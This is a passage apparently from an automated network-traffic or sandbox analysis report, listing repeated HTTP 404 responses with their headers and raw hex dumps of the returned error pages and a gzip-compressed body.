20 20 6d 61 72 67 69 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.15.8.1Date: Thu, 10 Oct 2024 12:13:52 GMTContent-Type: text/htmlContent-Length: 2842Connection: closeETag: "663736a8-b1a"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 e9 94 99 e8 af af 20 2d 20 70 68 70 73 74 75 64 79 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 70 72 61 67 6d 61 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 65 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 57 65 64 2c 20 32 36 20 46 65 62 20 31 39 39 37 20 30 38 3a 32 31 3a 35 37 20 47 4d 54 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 65 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 30 22 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 62 6f 64 79 7b 0d 0a 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 61 72 69 61 6c 2c 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 68 65 69 27 2c 27 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 20 47 42 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 6d 61 72 67 69 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.15.8.1Date: Thu, 10 Oct 2024 12:13:54 GMTContent-Type: text/htmlContent-Length: 2842Connection: closeETag: "663736a8-b1a"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.15.8.1Date: Thu, 10 Oct 2024 12:13:57 GMTContent-Type: text/htmlContent-Length: 2842Connection: closeETag: "663736a8-b1a"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.15.8.1Date: Thu, 10 Oct 2024 12:13:59 GMTContent-Type: text/htmlContent-Length: 2842Connection: closeETag: "663736a8-b1a"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 e9 94 99 e8 af af 20 2d 20 70 68 70 73 74 75 64 79 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 70 72 61 67 6d 61 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 65 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 57 65 64 2c 20 32 36 20 46 65 62 20 31 39 39 37 20 30 38 3a 32 31 3a 35 37 20 47 4d 54 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 65 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 30 22 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 62 6f 64 79 7b 0d 0a 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 61 72 69 61 6c 2c 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 68 65 69 27 2c 27 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 20 47 42 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 6d 61 72 67 69 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:14:19 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 38381X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:14:22 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 38381X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:14:24 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 38381X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 12:14:27 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 38381X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Oct 2024 12:14:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 